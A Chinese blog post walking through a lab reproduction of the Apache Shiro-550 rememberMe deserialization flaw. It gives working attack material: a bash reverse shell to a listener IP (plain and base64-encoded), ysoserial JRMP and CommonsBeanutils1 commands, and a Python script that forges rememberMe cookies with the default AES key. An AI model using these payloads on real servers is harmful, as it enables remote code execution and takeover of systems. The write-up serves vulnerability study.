百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术文章 > 正文

反序列化漏洞复现总结

nanshan 2024-11-23 20:12 23 浏览 0 评论

前言

最近一直在整理笔记,恰好碰到实习时遇到的Shiro反序列化漏洞,本着温故而知新的思想,就照着前辈们的文章好好研究了下,整理整理笔记并发个文章。

1、Apache Shiro介绍

Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。

2、Shiro rememberMe反序列化漏洞(Shiro-550)

2.1 受影响版本

Apache Shiro <=1.2.4

2.2 特征判断

返回包中含有rememberMe=deleteMe字段

2.3 漏洞原理

在Shiro <= 1.2.4中,反序列化过程中所用到的AES加密的key是硬编码在源码中,当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编码后存储在cookie的rememberMe字段中,服务端收到登录请求后,会对rememberMe的cookie值进行base64解码,接着进行AES解密,然后反序列化。由于AES加密是对称式加密(key既能加密数据也能解密数据),所以当攻击者知道了AES key后,就能够构造恶意的rememberMe cookie值从而触发反序列化漏洞。

3、漏洞复现

3.1 环境搭建

//获取docker镜像

docker pull medicean/vulapps:s_shiro_1

//启动容器

docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1

2021最新整理网络安全/渗透测试/安全学习/100份src技术文档(全套视频、CTF、大厂面经、精品手册、必备工具包、路线)一>关注我,私信回复“资料”获取<一

3.2 工具准备

3.2.1 配置maven

1、下载maven

http://maven.apache.org/download.cgi

2、配置win10 maven环境变量以及idea maven环境

https://zhuanlan.zhihu.com/p/48831465

3.2.2 下载ysoserial工具并打包

下载地址:https://github.com/frohoff/ysoserial

打包完的ysoserial在ysoserial/target文件中

git clone https://github.com/frohoff/ysoserial.git

cd ysoserial

mvn package -D skipTests

PS:终于打包完了,没想到Maven源换成了阿里云的速度还是有点慢。

3.3 漏洞检测

这里使用shiro_tool.jar工具检测Shiro是否存在默认的key,

java -jar shiro_tool.jar http://192.168.31.81:8080/


3.4 漏洞利用

3.4.1 方式一:nc反弹shell

1、制作反弹shell代码

首先,在kali中通过nc监听本地端口,

nc -lvp 4444

接着利用Java Runtime配合bash编码,

bash -i >& /dev/tcp/192.168.31.81/4444 0>&1

结果:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjgxLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}

2、通过ysoserial工具中的JRMP监听模块,监听6666端口并执行反弹shell命令,

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjgxLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}'

3、利用检测出的AES密钥,生成payload

import sys

import uuid

import base64

import subprocess

from Crypto.Cipher import AES

def encode_rememberme(command):

popen = subprocess.Popen([‘java’, ‘-jar’, ‘ysoserial-0.0.6-SNAPSHOT-all.jar’, ‘JRMPClient’, command], stdout=subprocess.PIPE)

BS = AES.block_size

pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()

key = base64.b64decode(“kPH+bIxk5D2deZiIxcaaaA==”)

iv = uuid.uuid4().bytes

encryptor = AES.new(key, AES.MODE_CBC, iv)

file_body = pad(popen.stdout.read())

base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))

return base64_ciphertext

if name == ‘main’:

payload = encode_rememberme(sys.argv[1])

print “rememberMe={0}”.format(payload.decode())

Python2用pip安装Crypto的过程中,出现了各种问题,最主要的问题就是各种报缺少Crypto.Cipher模块的错误,Google百度网上找了一大堆,疯狂pip安装卸载,都无法解决,后来索性采取了手动安装Crypto模块,最后终于解决。

问题一:ImportError: No module named Crypto.Cipher

——>手动下载Crypto包进行安装

下载地址:https://pypi.org/simple/pycrypto/

问题二:
error: command ‘x86_64-linux-gnu-gcc‘ failed with exit status 1

——>安装依赖库解决:

apt-get install build-essential python-dev libssl-dev libffi-dev libxml2 libxml2-dev libxslt1-dev zlib1g-dev

使用test_shiro550.py,生成payload

python test_shiro550.py 192.168.31.81:6666

4、利用生成的rememberMe值构造数据包,伪造cookie,发送请求。

5、查看nc监听结果,反弹shell成功。

nc成功反弹shell,whoami命令查询为root权限。

3.4.2 方式二:命令执行

1、使用ysoserial工具生成poc

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "echo 'test shiro-550' > /tmp/SUCCESS" > poc

2、使用Shiro默认AES Key对payload进行加密

3、brupsuite抓包,发送带有伪造的rememberMe Cookie的请求。

4、查看目标服务器的/tmp目录,确认生成了SUCCESS文件。

5、总结

Shiro-550漏洞产生的根本原因就是因为AES加密的key硬编码在源码中,从而可以被攻击者利用泄露的AES key伪造rememberMe字段生成cookie值,导致反序列化漏洞。因此,服务器端对cookie值的处理过程反过来就是payload的产生过程:命令=>进行序列化=>AES加密=>base64编码=>产生RememberMe Cookie值。

相关推荐

用Acronis True Imag安卡诺斯2016进行系统备份恢复

从WindowsXp一路走过来到现在使用的Win11,相信很多朋友和我一样,经历过N次病毒、系统崩溃、数据误删除等等惨痛教训,简直是历历在目,造成我有着很高的数据备份意识,养成了良好的数据备份习惯。...

云祺容灾备份系统V5.0新产品之文件备份

对于某些企业用户来说,他们更关注数据安全的基础备份需求,比如文件、文档或者历史记录等一些非结构性文件。这些重要文件的丢失,更会对企业的正常运作带来影响,给企业造成损失,为了保障生产业务的正常运行,一些...

Linux新手入门系列:Linux下mysql定时备份及恢复

本文是linux下mysql的导出、导入,及定时备份脚本的编写,及定时器的简单应用。本系列文章是把作者刚接触和学习Linux时候的实操记录分享出来,内容主要包括Linux入门的一些理论概念知识、Web...

怎么使用再生龙打包(备份)liunx系统

liunx系统区别于Windows,由于分区格式的特殊性并不能像GHOST那样进行备份封包,有款开源的针对liunx系统备份还原的软件-再生龙(clonezilla),可能有部分人已经用过,本篇文章让...

制作 Kali Linux 随身 U 盘并实现持久化

KaliLinux的前身是BackTrackLinux发行版。KaliLinux是一个基于Debian的Linux发行版,包括很多安全和取证方面的相关工具。它由Offensiv...

Time Machine 使用教程(三):为你的备份加把锁

在我们之前的两篇TimeMachine使用教程中,你应该已经学会如何简单进行TimeMachine备份和如何将外置的TimeMachine磁盘进行「一芯二用」。那么在接下来本篇的T...

linux多磁盘挂载至同一目录

由于业务需要,需要把多块磁盘挂载至同一目录下,通常情况下一个目录只能挂载一块磁盘,否则会覆盖之前的挂载。要想实现多磁盘挂载同一目录,则需要通过卷组的方式进行解决。工具安装yuminstalllvm...

Acronis Backup (Advanced)使用示例:备份与恢复(一)

列出磁盘列出本地计算机的所有磁盘。acrocmdlistdisks列出远程计算机的磁盘。acrocmdlistdisks--host=192.168.1.2--credential...

Linux基础运维篇:Linux文件操作超详细版(第007课)

一、Linux文件系统基础1.文件类型Linux一切皆文件,常见文件类型:普通文件(-):文本文件(.txt)、二进制文件(可执行程序)、压缩文件等。目录文件(d):用于组织文件和子目录(类似...

Linux的300+个真实运维场景——14 备份与恢复

场景154:备份不完整故障排除步骤:查看用于备份的脚本或命令是否有错误。cat/path/to/backup_script.sh检查备份日志文件是否有警告或错误。cat/var/log/ba...

使用再生龙工具备份还原linux 服务器

大家好,之前给大家介绍一个一款可以用来备份还原、远程克隆、P2V、V2V的工具--再生龙,今天就来给大家演示如何用该工具备份和还原一台linux服务器。软件版本:RHEL6.8*64+clonez...

Linux TB级小文件同步备份解决方案

在某些电子档案存储的业务系统下,按照业务场景要求,需要将产生的所有电子影像资料永久存储,并支持备份;因为“钞能力”等原因,一般备份存储只有一个节点(即:一个备份存储服务器);这样就要求研发工程师,不...

不用担心硬盘烧了,让你的电脑每天定时自动为你备份重要的文件

这是前几天一位网友提到的一个问题,他问我怎么让电脑每天定时自动备份重要的文件。我整理了操作流程,这里跟大家分享一下。先说说这个技巧有什么用途,打个比方,假如你每天都在编辑一些文档,你把它们保存在D...

每天自动备份Oracle数据库

本文以CentOS7.6系统与Oracle11g为例,教你如何在Linux下设置每天自动备份Oracle数据库。一.先找到数据库的环境变量如果是在root账户下,须先登录到数据库所在账户suor...

易备数据备份软件:Hyper-V/ESXi/ESXi Free 虚拟机的理想备份方案

易备数据备份软件提供完整的虚拟机备份解决方案,支持对Hyper-V/ESXi/vSphereHypervisor(ESXiFree)虚拟机实现(热)备份功能,可以用全自动的方式,将...

取消回复欢迎 发表评论: